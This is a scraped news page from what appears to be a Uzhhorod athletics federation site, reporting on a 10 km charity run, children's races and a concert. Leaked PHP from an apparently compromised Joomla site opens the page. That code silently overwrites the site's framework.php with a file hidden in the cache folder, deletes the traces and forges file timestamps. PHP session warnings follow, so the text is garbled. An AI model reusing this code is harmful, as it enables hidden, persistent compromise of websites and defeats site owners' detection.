$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 426
Ужгородська десятка стартувала | ФЕДЕРАЦІЯ ЛЕГКОЇ АТЛЕТИКИ УЖГОРОДА

 

Ужгородська десятка стартувала

20 вересня на стадіоні ДЮСШ №1
відбувся незвичний та неординарний
для міста захід – «Ужгородська десятка»
.  

    Легкоатлетичнй пробіг як спортивно-благодійна акція проводилася з ініціативи федерації легкої атлетики міста та приватного підприємця Віктора Поганя за підтримки обласного відділення НОК України.
Майже 150 учасників в різних вікових категоріях вийшли на старт. Чоловіки змагалися на дистанції

10 км. Переможцем у категорії до 35 років став кандидат у майстри спорту, динамівець Роман Гаврилюк, призерами Андрій Купар та Андрій Більца. У чоловіків старше 35 років переміг КМС

Анатолій Малий , призерами стали Юлій Ронай та Володимир Гроздицький. У жінок до 35 років перемогла  КМС Наталія Малая, другою на фініші була Бабак Таміла з Чопа, третьою – Ужгорода Лазаренко Оксана, у жінок старше 35 років перемогла Тураній Марія вчитель фізики ЗОШ № 5. Переможці, призери нагороджені медалями, грамотами, кубками та грошовими преміями, учасники, які вибороли місця з 4 по 6 отримали грамоти та грошові винагороди. 

Після забігів дорослих відбувся масовий дитячий забіг на 600 м, у якім прийняло участь 65 учасників. На фініші кожний отримав сертифікат від обласного відділення НОК України.

Далі відбувся заїзд на візках учасників з обмеженими фізичними можливостями на 200 м, забіг чотирьох річних дітей дошкільного закладу №39 на 50 м та проведено естафету серед сімейних команд «Тато, мама і я – спортивна сімя». Загалом заходи відбулися на всі смаки для всіх категорій мешканців міста.

 Вперше для себе пробіг 5-ти кілометрову дистанцію директор ЗОШ №5 Кіндюх Петро. В інтерв’ю після забігу він поділився своїми враженнями: «Я радий, що пробіг 5 км, набрався позитивних емоцій, хоча було і не легко на окремих відрізках дистанції. Приємно бігти вулицями міста, чудова атмосфера змагань надихає на те , що наступного року на «Ужгородській десятці 2» ви мене побачити щасливим на фініші 10-ти кілометрової дистанції.» Найстаршим учасником пробігу що прийняв участь у пробігу ста Долинич Юрій, якому вже за 60, а наймолодшою- Погань Кристина (4 роки).

 Після оголошення переможців зголоднілі учасники та гості змагань, судді пригощалися запашним бограчем, який для них майстерно приготували ресторан "Кактус" та Олександр Казьміров.
А в цей час розпочався святковий концерт під керуванням Ростислава Буланова та Олександра Мерявчика (корпорація свят "Не ПоНяЛ", королі вечірок "Коmedi Оrg"), який тривав понад дві години. Із оплесками вітали глядачі виступи народної студії сучасного танцю "Бліц", спортивно-хореографічна студія "Вікторія", співачки Аліни Паж, конкурсантки "Євробачення-2009" Ренати Штіфель, ансамбль "Сонячна Радванка" та команди КВН "От Фонаря". Варто відзначити, що такого рівня концерт відбувся виключно завдяки ентузіазму члена оргкомітету Олега Бачинського, який також є вихованцем студії "Бліц".

Серед присутніх на ужгородському марафоні були також гості з Угорщини, зокрема Іштван Варга, організатор, координар, ідейний натхненник VelenceiT?Maraton, який уже два роки поспіль проводиться на його батьківщині. Він відзначив високий рівень ужгородської акції, і висловив сподівання, що наступного року організаторам вдасться провести справжній марафон у нашому місті. Інший угорський гість - Петер Шовш, який, до речі, пробіг 10-кілометрову дистанцію і здобув четверте місце, вже за кілька днів відбув у Грецію, де проводиться відомий спартанський марафон - протягом 36 годин спортсмени мають здолати відстань 246 кілометрів. З огляду на такий рівень учасників "Ужгородської десятки", акцію можна назвати міжнародною.
          .

Власне , це все, що можна розповісти про проведення ПЕРШОЇ «Ужгородської десятки», хоч як можно описати той заряд емоцій та радісних почуттів, які отримали учасники та жителі нового району міста.
Якщо прагнете виглядати молодо, вести здоровий спосіб життя , виходьте вже сьогодні на стадіон, у парк, рухайтеся , і не обов’язково бігом, і приєднуйтеся до нас наступного року на «Ужгородській десятці -2». Займайтеся фізичною культурою та спортом і будьте здорові.

Бути здоровим – стильно.

 

Анатолій Коломоєць -керівник змагань

 
ГОЛОВНА НОВИНИ новини Ужгородська десятка стартувала
'Flauz' интернет магазин спортивного питания